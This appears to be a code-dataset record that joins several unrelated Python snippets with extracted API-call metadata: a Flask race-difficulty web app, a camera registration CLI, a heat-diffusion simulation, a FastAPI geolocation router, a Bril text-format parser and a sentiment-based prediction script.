cur.execute(sql_select_query, (str(race), ))
record = cur.fetchall()
row = record[0]
beta = []
for i in row:
beta.append(i)
return beta
def get_score(betax, race_type):
# There probably is a fast query to do this but I couldn't get it right in ~5 minutes
# so I moved on...
sql_select_query = """SELECT * FROM d_dist WHERE race_type = %s"""
cur.execute(sql_select_query, (str(race_type), ))
record = cur.fetchall()
bins, xs, ys, dxs = [], [], [], []
for row in record:
bins.append(row[0])
xs.append(row[1])
ys.append(row[2])
dxs.append(row[3])
score = -1.0
for idx,val in enumerate(xs):
dx = dxs[idx]*0.5
dlo = xs[idx] - dx
dhi = xs[idx] + dx
if (betax >= dlo) and (betax < dhi):
score = ys[idx]
break
return score
def get_avg(column_name, race_type):
sql_select_query = """SELECT AVG(min_time), AVG(sum_up), AVG(sigma), AVG(diff), AVG(dt) FROM race_info WHERE race_type = %s"""
input = [str(race_type)]
cur.execute(sql_select_query, input)
record = cur.fetchall()
rec_dict = {'min_time': record[0][0],
'sum_up' : record[0][1],
'sigma' : record[0][2],
'diff' : record[0][3],
'dt' : record[0][4]}
if column_name in rec_dict:
return float(rec_dict[column_name])
else:
return 0.0
def get_elevation_dict(meeting_id, race_type):
sql_select_query = """SELECT bin,elevation FROM gpx WHERE meeting_id = %s"""
input = [str(meeting_id)]
cur.execute(sql_select_query, input)
record = cur.fetchall()
xval, yval = [], []
N = len(record)
bins = {}
for row in record:
bins[row[0]] = (row[0], row[1])
norm = (1.0 / float(N)) * (float(conversion[str(race_type)]) )
for key, val in bins.items():
if key%10 is 0: # reduce the granularity of the arrays
xval.append( val[0] * norm )
yval.append( val[1] )
return [xval,yval]
AllEvents = {}
AllEvents['10K'] = sql_get_events("10K")
AllEvents['Mar'] = sql_get_events("Mar")
| [
"flask.render_template",
"flask.request.args.get",
"matplotlib.pyplot.grid",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.switch_backend",
"flaskext.mysql.MySQL",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.close",
"app.app.route",
"matplotlib.pyplot.scatter",
"random.choice",
"matplotlib... | [((201, 226), 'matplotlib.pyplot.switch_backend', 'plt.switch_backend', (['"""agg"""'], {}), "('agg')\n", (219, 226), True, 'import matplotlib.pyplot as plt\n'), ((405, 412), 'flaskext.mysql.MySQL', 'MySQL', ([], {}), '()\n', (410, 412), False, 'from flaskext.mysql import MySQL\n'), ((823, 837), 'app.app.route', 'app.route', (['"""/"""'], {}), "('/')\n", (832, 837), False, 'from app import app\n'), ((839, 858), 'app.app.route', 'app.route', (['"""/index"""'], {}), "('/index')\n", (848, 858), False, 'from app import app\n'), ((1004, 1023), 'app.app.route', 'app.route', (['"""/about"""'], {}), "('/about')\n", (1013, 1023), False, 'from app import app\n'), ((1080, 1101), 'app.app.route', 'app.route', (['"""/contact"""'], {}), "('/contact')\n", (1089, 1101), False, 'from app import app\n'), ((1162, 1182), 'app.app.route', 'app.route', (['"""/output"""'], {}), "('/output')\n", (1171, 1182), False, 'from app import app\n'), ((951, 1001), 'flask.render_template', 'render_template', (['"""index.html"""'], {'AllEvents': 'AllEvents'}), "('index.html', AllEvents=AllEvents)\n", (966, 1001), False, 'from flask import render_template, url_for, request, Flask\n'), ((1048, 1077), 'flask.render_template', 'render_template', (['"""about.html"""'], {}), "('about.html')\n", (1063, 1077), False, 'from flask import render_template, url_for, request, Flask\n'), ((1128, 1159), 'flask.render_template', 'render_template', (['"""contact.html"""'], {}), "('contact.html')\n", (1143, 1159), False, 'from flask import render_template, url_for, request, Flask\n'), ((1940, 1959), 'pandas.Series', 'pd.Series', (['age_type'], {}), '(age_type)\n', (1949, 1959), True, 'import pandas as pd\n'), ((1979, 2001), 'pandas.Series', 'pd.Series', (['gender_type'], {}), '(gender_type)\n', (1988, 2001), True, 'import pandas as pd\n'), ((3552, 3754), 'flask.render_template', 'render_template', (['"""output.html"""'], {'betax': 'betax', 'score': 'score', 'course_score': 'course_score', 'event': 'event', 'beta': 'beta', 'args': 'args', 'name': 'name', 'name_gpx': 'name_gpx', 'name_score': 'name_score', 'name_diff': 'name_diff'}), "('output.html', betax=betax, score=score, course_score=\n course_score, event=event, beta=beta, args=args, name=name, name_gpx=\n name_gpx, name_score=name_score, name_diff=name_diff)\n", (3567, 3754), False, 'from flask import render_template, url_for, request, Flask\n'), ((4864, 4876), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4874, 4876), True, 'import matplotlib.pyplot as plt\n'), ((4886, 4902), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (4897, 4902), True, 'import matplotlib.pyplot as plt\n'), ((5161, 5207), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Relative Difficulty"""'], {'fontsize': '(16)'}), "('Relative Difficulty', fontsize=16)\n", (5171, 5207), True, 'import matplotlib.pyplot as plt\n'), ((5212, 5257), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Score Distribution"""'], {'fontsize': '(16)'}), "('Score Distribution', fontsize=16)\n", (5222, 5257), True, 'import matplotlib.pyplot as plt\n'), ((5263, 5281), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (5279, 5281), True, 'import matplotlib.pyplot as plt\n'), ((5462, 5479), 'matplotlib.pyplot.savefig', 'plt.savefig', (['name'], {}), '(name)\n', (5473, 5479), True, 'import matplotlib.pyplot as plt\n'), ((5484, 5498), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (5493, 5498), True, 'import matplotlib.pyplot as plt\n'), ((6227, 6239), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6237, 6239), True, 'import matplotlib.pyplot as plt\n'), ((6249, 6265), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (6260, 6265), True, 'import matplotlib.pyplot as plt\n'), ((6270, 6280), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (6278, 6280), True, 'import matplotlib.pyplot as plt\n'), ((6290, 6363), 'matplotlib.pyplot.scatter', 'plt.scatter', (['Time', 'Score'], {'c': '"""black"""', 's': '(30)', 'marker': '"""o"""', 'label': '"""All Scores"""'}), "(Time, Score, c='black', s=30, marker='o', label='All Scores')\n", (6301, 6363), True, 'import matplotlib.pyplot as plt\n'), ((6363, 6441), 'matplotlib.pyplot.scatter', 'plt.scatter', (['ThisTime', 'ThisScore'], {'c': '"""red"""', 's': '(40)', 'marker': '"""^"""', 'label': '"""This Race"""'}), "(ThisTime, ThisScore, c='red', s=40, marker='^', label='This Race')\n", (6374, 6441), True, 'import matplotlib.pyplot as plt\n'), ((6555, 6607), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Average Finish Time (min)"""'], {'fontsize': '(15)'}), "('Average Finish Time (min)', fontsize=15)\n", (6565, 6607), True, 'import matplotlib.pyplot as plt\n'), ((6611, 6657), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Relative Difficulty"""'], {'fontsize': '(15)'}), "('Relative Difficulty', fontsize=15)\n", (6621, 6657), True, 'import matplotlib.pyplot as plt\n'), ((6661, 6679), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (6677, 6679), True, 'import matplotlib.pyplot as plt\n'), ((6864, 6881), 'matplotlib.pyplot.savefig', 'plt.savefig', (['name'], {}), '(name)\n', (6875, 6881), True, 'import matplotlib.pyplot as plt\n'), ((6886, 6900), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (6895, 6900), True, 'import matplotlib.pyplot as plt\n'), ((7394, 7406), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (7404, 7406), True, 'import matplotlib.pyplot as plt\n'), ((7417, 7460), 'matplotlib.pyplot.subplot2grid', 'plt.subplot2grid', (['(2, 2)', '(0, 0)'], {'colspan': '(2)'}), '((2, 2), (0, 0), colspan=2)\n', (7433, 7460), True, 'import matplotlib.pyplot as plt\n'), ((7465, 7475), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (7473, 7475), True, 'import matplotlib.pyplot as plt\n'), ((7530, 7567), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Importance"""'], {'fontsize': '(12)'}), "('Importance', fontsize=12)\n", (7540, 7567), True, 'import matplotlib.pyplot as plt\n'), ((7572, 7614), 'matplotlib.pyplot.title', 'plt.title', (['"""Regression Feature Importance"""'], {}), "('Regression Feature Importance')\n", (7581, 7614), True, 'import matplotlib.pyplot as plt\n'), ((7619, 7666), 'matplotlib.pyplot.xticks', 'plt.xticks', (['xint', 'labels'], {'rotation': '(0)', 'wrap': '(True)'}), '(xint, labels, rotation=0, wrap=True)\n', (7629, 7666), True, 'import matplotlib.pyplot as plt\n'), ((7672, 7690), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (7688, 7690), True, 'import matplotlib.pyplot as plt\n'), ((7967, 8010), 'matplotlib.pyplot.subplot2grid', 'plt.subplot2grid', (['(2, 2)', '(1, 0)'], {'colspan': '(1)'}), '((2, 2), (1, 0), colspan=1)\n', (7983, 8010), True, 'import matplotlib.pyplot as plt\n'), ((8234, 8278), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Finish Time (min)"""'], {'fontsize': '(12)'}), "('Finish Time (min)', fontsize=12)\n", (8244, 8278), True, 'import matplotlib.pyplot as plt\n'), ((8283, 8361), 'matplotlib.pyplot.xticks', 'plt.xticks', (['xint', "['Course \\n Time', 'Average \\n Time']"], {'rotation': '(0)', 'wrap': '(True)'}), "(xint, ['Course \\n Time', 'Average \\n Time'], rotation=0, wrap=True)\n", (8293, 8361), True, 'import matplotlib.pyplot as plt\n'), ((8622, 8640), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (8638, 8640), True, 'import matplotlib.pyplot as plt\n'), ((8716, 8759), 'matplotlib.pyplot.subplot2grid', 'plt.subplot2grid', (['(2, 2)', '(1, 1)'], {'colspan': '(1)'}), '((2, 2), (1, 1), colspan=1)\n', (8732, 8759), True, 'import matplotlib.pyplot as plt\n'), ((8794, 8841), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Course Elevation (m)"""'], {'fontsize': '(12)'}), "('Course Elevation (m)', fontsize=12)\n", (8804, 8841), True, 'import matplotlib.pyplot as plt\n'), ((8846, 8886), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Distance (mi)"""'], {'fontsize': '(10)'}), "('Distance (mi)', fontsize=10)\n", (8856, 8886), True, 'import matplotlib.pyplot as plt\n'), ((9019, 9037), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (9035, 9037), True, 'import matplotlib.pyplot as plt\n'), ((9225, 9242), 'matplotlib.pyplot.savefig', 'plt.savefig', (['name'], {}), '(name)\n', (9236, 9242), True, 'import matplotlib.pyplot as plt\n'), ((9980, 9992), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (9990, 9992), True, 'import matplotlib.pyplot as plt\n'), ((10004, 10020), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(111)'], {}), '(111)\n', (10015, 10020), True, 'import matplotlib.pyplot as plt\n'), ((10320, 10345), 'matplotlib.pyplot.title', 'plt.title', (['"""GPS Features"""'], {}), "('GPS Features')\n", (10329, 10345), True, 'import matplotlib.pyplot as plt\n'), ((10425, 10435), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (10433, 10435), True, 'import matplotlib.pyplot as plt\n'), ((10440, 10461), 'matplotlib.pyplot.savefig', 'plt.savefig', (['name_gpx'], {}), '(name_gpx)\n', (10451, 10461), True, 'import matplotlib.pyplot as plt\n'), ((10466, 10480), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (10475, 10480), True, 'import matplotlib.pyplot as plt\n'), ((10486, 10501), 'matplotlib.pyplot.close', 'plt.close', (['fig2'], {}), '(fig2)\n', (10495, 10501), True, 'import matplotlib.pyplot as plt\n'), ((1458, 1481), 'flask.request.args.get', 'request.args.get', (['"""age"""'], {}), "('age')\n", (1474, 1481), False, 'from flask import render_template, url_for, request, Flask\n'), ((1505, 1531), 'flask.request.args.get', 'request.args.get', (['"""gender"""'], {}), "('gender')\n", (1521, 1531), False, 'from flask import render_template, url_for, request, Flask\n'), ((1555, 1579), 'flask.request.args.get', 'request.args.get', (['"""race"""'], {}), "('race')\n", (1571, 1579), False, 'from flask import render_template, url_for, request, Flask\n'), ((1603, 1628), 'flask.request.args.get', 'request.args.get', (['"""event"""'], {}), "('event')\n", (1619, 1628), False, 'from flask import render_template, url_for, request, Flask\n'), ((1768, 1824), 'flask.render_template', 'render_template', (['"""value_error.html"""'], {'AllEvents': 'AllEvents'}), "('value_error.html', AllEvents=AllEvents)\n", (1783, 1824), False, 'from flask import render_template, url_for, request, Flask\n'), ((1863, 1919), 'flask.render_template', 'render_template', (['"""value_error.html"""'], {'AllEvents': 'AllEvents'}), "('value_error.html', AllEvents=AllEvents)\n", (1878, 1919), False, 'from flask import render_template, url_for, request, Flask\n'), ((8386, 8442), 'matplotlib.patches.Patch', 'Patch', ([], {'facecolor': 'palette2[0]', 'label': '"""Course Median Time"""'}), "(facecolor=palette2[0], label='Course Median Time')\n", (8391, 8442), False, 'from matplotlib.patches import Patch\n'), ((2025, 2046), 'pandas.Series', 'pd.Series', (['event_type'], {}), '(event_type)\n', (2034, 2046), True, 'import pandas as pd\n'), ((5307, 5358), 'random.choice', 'random.choice', (['(string.ascii_letters + string.digits)'], {}), '(string.ascii_letters + string.digits)\n', (5320, 5358), False, 'import random\n'), ((6705, 6756), 'random.choice', 'random.choice', (['(string.ascii_letters + string.digits)'], {}), '(string.ascii_letters + string.digits)\n', (6718, 6756), False, 'import random\n'), ((9068, 9119), 'random.choice', 'random.choice', (['(string.ascii_letters + string.digits)'], {}), '(string.ascii_letters + string.digits)\n', (9081, 9119), False, 'import random\n')] |
# vim: set ff=unix expandtab ts=4 sw=4:
from copy import deepcopy
from .TsTpMassFields import TsTpMassFieldsPerPool
class CompatibleTsTpMassFieldsPerPool(TsTpMassFieldsPerPool):
# This class is a list of mass Distributions with an entry for every
# pool
def __init__(self, normal_list):
# make sure it has at least one entry
if not (len(normal_list)) > 0:
raise (Exception("There has to be at least one pool"))
# check if all the Fields have the same tss
for i, el in enumerate(self):
if not (el.tss == self[0].tss):
raise (
Exception(
Template(
"Element number ${i} had tts=${etss} while the first element of the list had tss=${first_tss}"
).substitute(i=i, etss=el.tss, first_tss=self[0].tss)
)
)
# now check the sizes of the entries and adapt them as neccessary
# to accomodate all possible transfers:
# all pools must be able to receive Material from any other pool
# The maximum system Age for every pool is the maximum System age
# of all pools
# print("#############################")
# print("self:=",normal_list)
overall_number_of_Ts_entries = max(
[field.number_of_Ts_entries for field in normal_list]
)
for el in normal_list:
el.resize(overall_number_of_Ts_entries)
# create a the dict like structure
super().__init__({k: val for k, val in enumerate(normal_list)})
def advanced(
self, external_inputs, internal_death_rate_fields, outward_death_rate_fields
):
# Note that the fields in res will become one tss bigger in
# Ts size although we start with a copy..
res = deepcopy(self)
ol = res.external_losses(outward_death_rate_fields)
res.remove(ol)
il = self.internal_losses(internal_death_rate_fields)
res.remove(il)
gains = il.gains
res.receive(gains)
res.shift() # move forward in time which increases size of the fields
res.receive_external(external_inputs)
return res
@property
def number_of_pools(self):
return len(self)
| [
"copy.deepcopy"
] | [((1860, 1874), 'copy.deepcopy', 'deepcopy', (['self'], {}), '(self)\n', (1868, 1874), False, 'from copy import deepcopy\n')] |
"""
An app script to run registration between two cameras from the command line.
Copyright (C) Microsoft Corporation. All rights reserved.
"""
# Standard Libraries.
import argparse
# Calibration tools.
from camera_tools import register
# ------------------------------------------------------------------------------
def parse_args():
"""
Get arguments for running the registration.
Returns:
args -- Return a list of command line arguments for running registration.
"""
parser = argparse.ArgumentParser(description="Get extrinsics for cameras.")
parser.add_argument("-ia", "--img-a", required=True,
help="Full path to image from camera A.")
parser.add_argument("-ib", "--img-b", required=True,
help="Full path to image from camera B.")
parser.add_argument("-t", "--template", required=True,
help="Full path to Charuco board template file.")
parser.add_argument("-ca", "--calib-a", required=True,
help="Full path to calibration file from camera A.")
parser.add_argument("-cb", "--calib-b", required=True,
help="Full path to calibration file from camera B.")
parser.add_argument("-o", "--out-dir", required=True,
help="Output directory for full calibration blob.")
cmd_args = parser.parse_args()
return cmd_args
if __name__ == "__main__":
args = parse_args()
rotation, translation, rms1_pixels, rms1_rad, rms2_pixels, rms2_rad = \
register(args.img_a,
args.img_b,
args.template,
args.calib_a,
args.calib_b,
args.out_dir)
| [
"camera_tools.register",
"argparse.ArgumentParser"
] | [((499, 565), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Get extrinsics for cameras."""'}), "(description='Get extrinsics for cameras.')\n", (522, 565), False, 'import argparse\n'), ((1400, 1493), 'camera_tools.register', 'register', (['args.img_a', 'args.img_b', 'args.template', 'args.calib_a', 'args.calib_b', 'args.out_dir'], {}), '(args.img_a, args.img_b, args.template, args.calib_a, args.calib_b,\n args.out_dir)\n', (1408, 1493), False, 'from camera_tools import register\n')] |
#!/usr/bin/env python3
from shutil import which
import sys
def check_program_exists(program):
if which(program) is None:
print('ERROR: Could not find {}. Is it installed? Is PATH setup properly?'.format(program))
sys.exit() | [
"shutil.which",
"sys.exit"
] | [((104, 118), 'shutil.which', 'which', (['program'], {}), '(program)\n', (109, 118), False, 'from shutil import which\n'), ((236, 246), 'sys.exit', 'sys.exit', ([], {}), '()\n', (244, 246), False, 'import sys\n')] |
import params
import numpy as np
def calc_min_delta_t(delta_x, alpha, v_max) -> int:
return min(1, 1 / 4 * delta_x ** 2 / alpha, delta_x / v_max)
def adjust_boundary(T, v_x, v_y):
T[0, :] = params.T_h
T[-1, :] = T[-2, :]
T[:, 0] = T[:, 1]
T[:, -1] = T[:, -2]
v_y[0, :] = 0
v_y[-1, :] = v_y[-2, :]
v_y[:, 0] = v_y[:, 1]
v_y[:, -1] = v_y[:, -2]
def diffusion_x_op(T, alpha, delta_t, delta_x):
T[1:-1, 1:-1] = T[1:-1, 1:-1] + alpha * delta_t / \
pow(delta_x, 2) * (T[1:-1, 0:-2]-2*T[1:-1, 1:-1]+T[1:-1, 2:])
def diffusion_y_op(T, alpha, delta_t, delta_x):
T_cen = T[1:-1, 1:-1]
T_down = T[0:-2, 1:-1]
T_up = T[2:, 1:-1]
T[1:-1, 1:-1] = T_cen + alpha * delta_t / \
pow(delta_x, 2) * (T_down-2*T_cen+T_up)
def heat_convection_y_op(T, v_y, delta_t, delta_x):
T_cen = T[1:-1, 1:-1]
T_down = T[0:-2, 1:-1]
v_y_cen = v_y[1:-1, 1:-1]
T[1:-1, 1:-1] = T_cen - delta_t / delta_x * v_y_cen * (T_cen-T_down)
def mom_convection_y_op(T, v_y, delta_t, delta_x):
T_cen = T[1:-1, 1:-1]
v_y_cen = v_y[1:-1, 1:-1]
v_y_down = v_y[0:-2, 1:-1]
T_up = T[2:, 1:-1]
b = params.g * np.maximum(np.zeros(T_cen.shape),
(T_cen-T_up)/T_up)
v_y[1:-1, 1:-1] = v_y_cen + delta_t * b - \
delta_t / delta_x * v_y_cen * (v_y_cen-v_y_down)
| [
"numpy.zeros"
] | [((1184, 1205), 'numpy.zeros', 'np.zeros', (['T_cen.shape'], {}), '(T_cen.shape)\n', (1192, 1205), True, 'import numpy as np\n')] |
"""
Routes here:
- Where am I ?
- Return the street, city and country a given geolocation point is at.
- Linear distance (Haversine)
- Return the linear distance on a globe given two geo-coordinates.
"""
from fastapi import APIRouter
from src.service.HaversineService import linear_distance
from src.model.linearDistance import linearDistance
from src.model.pairCoordinate import pairCoordinate
from src.service.whereAmIService import getLocation
router = APIRouter()
@router.post("/linearDistance")
def get_linear_distance(distance: linearDistance):
result_in_kilometers = linear_distance(distance)
return {"Kilometers": result_in_kilometers}
@router.post("/whereAmI")
def get_where_am_i(local: pairCoordinate):
location = getLocation(local)
return {"Location": location}
| [
"src.service.HaversineService.linear_distance",
"fastapi.APIRouter",
"src.service.whereAmIService.getLocation"
] | [((469, 480), 'fastapi.APIRouter', 'APIRouter', ([], {}), '()\n', (478, 480), False, 'from fastapi import APIRouter\n'), ((593, 618), 'src.service.HaversineService.linear_distance', 'linear_distance', (['distance'], {}), '(distance)\n', (608, 618), False, 'from src.service.HaversineService import linear_distance\n'), ((753, 771), 'src.service.whereAmIService.getLocation', 'getLocation', (['local'], {}), '(local)\n', (764, 771), False, 'from src.service.whereAmIService import getLocation\n')] |
"""A text format for Bril.
This module defines both a parser and a pretty-printer for a
human-editable representation of Bril programs. There are two commands:
`bril2txt`, which takes a Bril program in its (canonical) JSON format and
pretty-prints it in the text format, and `bril2json`, which parses the
format and emits the ordinary JSON representation.
"""
import lark
import sys
import json
__version__ = '0.0.1'
# Text format parser.
GRAMMAR = """
start: imp* func*
imp: "import" CNAME ";"
func: CNAME arg* "{" instr* "}" | CNAME arg* ":" type "{" instr* "}"
def_func: "def" func
?instr: def_func | const | vop | eop | label
const.4: IDENT ":" type "=" "const" lit ";"
vop.3: IDENT ":" type "=" CNAME IDENT* ";"
eop.2: CNAME IDENT* ";"
label.1: IDENT ":"
lit: SIGNED_INT -> int
| BOOL -> bool
type: CNAME
arg: IDENT | "(" IDENT ":" type ")"
BOOL: "true" | "false"
IDENT: ("_"|"%"|LETTER) ("_"|"%"|"."|LETTER|DIGIT)*
COMMENT: /#.*/
%import common.SIGNED_INT
%import common.WS
%import common.CNAME
%import common.LETTER
%import common.DIGIT
%ignore WS
%ignore COMMENT
""".strip()
class JSONTransformer(lark.Transformer):
def start(self, items):
imports = []
while len(items) > 0 and type(items[0]) == lark.lexer.Token:
imports.append(items.pop(0))
data = {'functions': items}
if len(imports) > 0:
data['imports'] = imports
return data
def imp(self, items):
return items.pop(0) # The module name
def func(self, items):
name = items.pop(0)
args = []
while (len(items) > 0 and type(items[0]) == lark.tree.Tree and
items[0].data == "arg"):
arg = items.pop(0).children
args.append(
dict(name=arg[0], type=arg[1] if len(arg) > 1 else None))
function_type = items.pop(0) if type(items[0]) == str else None
data = {'name': str(name), 'instrs': items}
if len(args):
data['args'] = args
if function_type is not None:
data['type'] = function_type
return data
def def_func(self, items):
return items.pop(0)
def const(self, items):
dest = items.pop(0)
type = items.pop(0)
val = items.pop(0)
return {
'op': 'const',
'dest': str(dest),
'type': type,
'value': val,
}
def vop(self, items):
dest = items.pop(0)
type = items.pop(0)
op = items.pop(0)
return {
'op': str(op),
'dest': str(dest),
'type': type,
'args': [str(t) for t in items],
}
def eop(self, items):
op = items.pop(0)
return {
'op': str(op),
'args': [str(t) for t in items],
}
def label(self, items):
name = items.pop(0)
return {
'label': name,
}
def int(self, items):
return int(str(items[0]))
def bool(self, items):
if str(items[0]) == 'true':
return True
else:
return False
def type(self, items):
return str(items[0])
def parse_bril(txt):
parser = lark.Lark(GRAMMAR)
tree = parser.parse(txt)
data = JSONTransformer().transform(tree)
function_names = [f['name'] for f in data['functions']]
unique = set()
dups = [f for f in function_names if f in unique and not unique.add(f)]
if len(dups) > 0:
raise RuntimeError(
'Function(s) defined twice: {}'.format(', '.join(dups)))
return json.dumps(data, indent=2, sort_keys=True)
def unroll_imports(prog):
if 'imports' not in prog:
return json.dumps(prog, indent=2, sort_keys=True)
to_import = set(prog['imports'])
all_functions_map = {f['name']: f for f in prog['functions']}
imported = set()
while len(to_import) > 0:
module_name = to_import.pop()
imported.add(module_name)
try:
with open('{}.bril'.format(module_name)) as f:
loaded_prog = json.loads(parse_bril(f.read()))
except IOError:
sys.stderr.write('Failed to load {}.bril\n'.format(module_name))
sys.stderr.flush()
sys.exit(1)
imports = set(loaded_prog.get('imports', []))
to_import.update(imports.difference(imported))
dups = {f['name'] for f in loaded_prog['functions']}
dups.intersection_update(all_functions_map.keys())
if len(dups) > 0:
raise RuntimeError(
'Function(s) defined twice: {}'.format(', '.join(dups)))
all_functions_map.update({f['name']: f for f in loaded_prog['functions']})
return json.dumps(
dict(functions=list(all_functions_map.values())),
indent=2,
sort_keys=True)
# Text format pretty-printer.
def instr_to_string(instr):
if instr['op'] == 'const':
return '{}: {} = const {}'.format(
instr['dest'],
instr['type'],
str(instr['value']).lower(),
)
elif 'dest' in instr:
return '{}: {} = {} {}'.format(
instr['dest'],
instr['type'],
instr['op'],
' '.join(instr['args']),
)
else:
return '{} {}'.format(
instr['op'],
' '.join(instr['args']),
)
def print_instr(instr):
print(' {};'.format(instr_to_string(instr)))
def print_label(label):
print('{}:'.format(label['label']))
def print_func(func):
print('{} {{'.format(func['name'], func.get('type', 'void')))
for instr_or_label in func['instrs']:
if 'label' in instr_or_label:
print_label(instr_or_label)
else:
print_instr(instr_or_label)
print('}')
def print_prog(prog):
for func in prog['functions']:
print_func(func)
# Command-line entry points.
def bril2json():
print(parse_bril(sys.stdin.read()))
def bril2txt():
print_prog(json.load(sys.stdin))
def loadbril():
print(json.dumps(unroll_imports(json.load(sys.stdin)), indent=2, sort_keys=True))
| [
"lark.Lark",
"json.dumps",
"sys.stderr.flush",
"sys.exit",
"json.load",
"sys.stdin.read"
] | [((3352, 3370), 'lark.Lark', 'lark.Lark', (['GRAMMAR'], {}), '(GRAMMAR)\n', (3361, 3370), False, 'import lark\n'), ((3739, 3781), 'json.dumps', 'json.dumps', (['data'], {'indent': '(2)', 'sort_keys': '(True)'}), '(data, indent=2, sort_keys=True)\n', (3749, 3781), False, 'import json\n'), ((3860, 3902), 'json.dumps', 'json.dumps', (['prog'], {'indent': '(2)', 'sort_keys': '(True)'}), '(prog, indent=2, sort_keys=True)\n', (3870, 3902), False, 'import json\n'), ((6239, 6259), 'json.load', 'json.load', (['sys.stdin'], {}), '(sys.stdin)\n', (6248, 6259), False, 'import json\n'), ((6183, 6199), 'sys.stdin.read', 'sys.stdin.read', ([], {}), '()\n', (6197, 6199), False, 'import sys\n'), ((4389, 4407), 'sys.stderr.flush', 'sys.stderr.flush', ([], {}), '()\n', (4405, 4407), False, 'import sys\n'), ((4421, 4432), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (4429, 4432), False, 'import sys\n'), ((6319, 6339), 'json.load', 'json.load', (['sys.stdin'], {}), '(sys.stdin)\n', (6328, 6339), False, 'import json\n')] |
import warnings
import numpy as np
from tabulate import tabulate
from collections import Counter
from sklearn.ensemble import ExtraTreesClassifier
from sklearn.metrics import precision_score, recall_score, f1_score
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
def get_sentiment(documents, document_ids):
"""
Input - A document_df that basically has documents
and their IDs [tweetid/message hash etc]
Returns - A dictionary mapping document ID to sentiment
from Vader
This function is basically as a function that is generic
to the documents which at the moment are tweets & news
articles.
"""
# Vader
vader = SentimentIntensityAnalyzer()
# Create & populating dict mapping document_id
# to sentiment dict
sentiment_dict = {}
for i, document in enumerate(documents):
if document_ids[i] not in sentiment_dict:
sentiment_dict[document_ids[i]] = vader.polarity_scores(document)
return sentiment_dict
def make_predictions(location_features_dict, labels, model=None, permute=False, lead_days=2, days_window=5):
"""
Input -
location_features_dict - The dict mapping from location to features
labels - Label dict generated from process_acled_csv(..)
model - Specific sklearn model to evaluate/benchmark performance
permute - Permute the data before train-test split
Returns - None
"""
# Table for presenting on tabulate
result_table = []
# Suppress warnings for divide-by-zero error
warnings.filterwarnings("ignore")
# Compute intersection for locations present on both dicts
common_locations = set(location_features_dict.keys()) & set(labels.keys())
# Sorted for clarity
common_locations = sorted(list(common_locations))
for common_location in common_locations:
# Get data and labels
X, y = location_features_dict[common_location], labels[common_location]
X, y = np.array(X), np.array(y)
# Eliminate last days to match labels.shape
X = X[:-(lead_days + days_window)]
# Permute randomly if specified
if permute:
p = np.random.permutation(len(X))
X, y = X[p], y[p]
# Split data into train & test - 75% & 25%
split = int(0.75 * len(X))
xtrain, ytrain = X[:split], y[:split]
xtest, ytest = X[split:], y[split:]
# Default model
if model is None:
model = xgboost.XGBClassifier(n_estimators=200, n_jobs=-1)
# Fit the train data
model.fit(xtrain, ytrain)
# Make predictions
ypred = model.predict(xtest)
# Compute metrics
train_acc = model.score(xtrain, ytrain)
test_acc = model.score(xtest, ytest)
precision = precision_score(ytest, ypred)
recall = recall_score(ytest, ypred)
f1 = f1_score(ytest, ypred)
# Add row to result_table
result_row = [
common_location,
np.round(train_acc, 2), np.round(test_acc, 2),
np.round(precision, 2), np.round(recall, 2),
np.round(f1, 2), np.round(np.sum(y) / len(y), 2)
]
result_table.append(result_row)
# Average stats
# Turns out median is kind of useless
result_table_copy = (np.array(result_table)[:, 1:]).astype(np.float32)
averages = np.round(np.mean(result_table_copy, axis=0), 2)
# Sort by test accuracy
result_table = sorted(result_table, key=lambda x: -x[-2])
# Add them to the existing result table
result_table.append(["Average"] + averages.tolist())
# Header for table
header = ["Location", "Train Accuracy", "Test Accuracy",
"Precision", "Recall", "F1 Score", "+'s in data"]
# Print tabulated result
print(tabulate(result_table,
tablefmt="pipe",
stralign="center",
headers=header))
# Unsuppress warning
warnings.filterwarnings("default")
return
def get_features(date_dict):
"""
Input: date_dict to compute features for each date
Returns: Features for each date
"""
# Initialize list for features
features = []
# Iterate through dates
for date in date_dict:
feature_row = []
docs = date_dict[date]
# If no rows are present, add zero-row
if docs is None:
feature_row = [0] * 6
else:
# Compute features
feature_row.append(len(docs))
mean = docs.mean()
feature_row.extend(
[mean['pos'], mean['neg'], mean['neu'], mean['compound']])
feature_row.append(len(docs[docs['neg'] > 0]))
# Add feature_row to above list
features.append(feature_row)
return features
| [
"vaderSentiment.vaderSentiment.SentimentIntensityAnalyzer",
"numpy.mean",
"sklearn.metrics.f1_score",
"tabulate.tabulate",
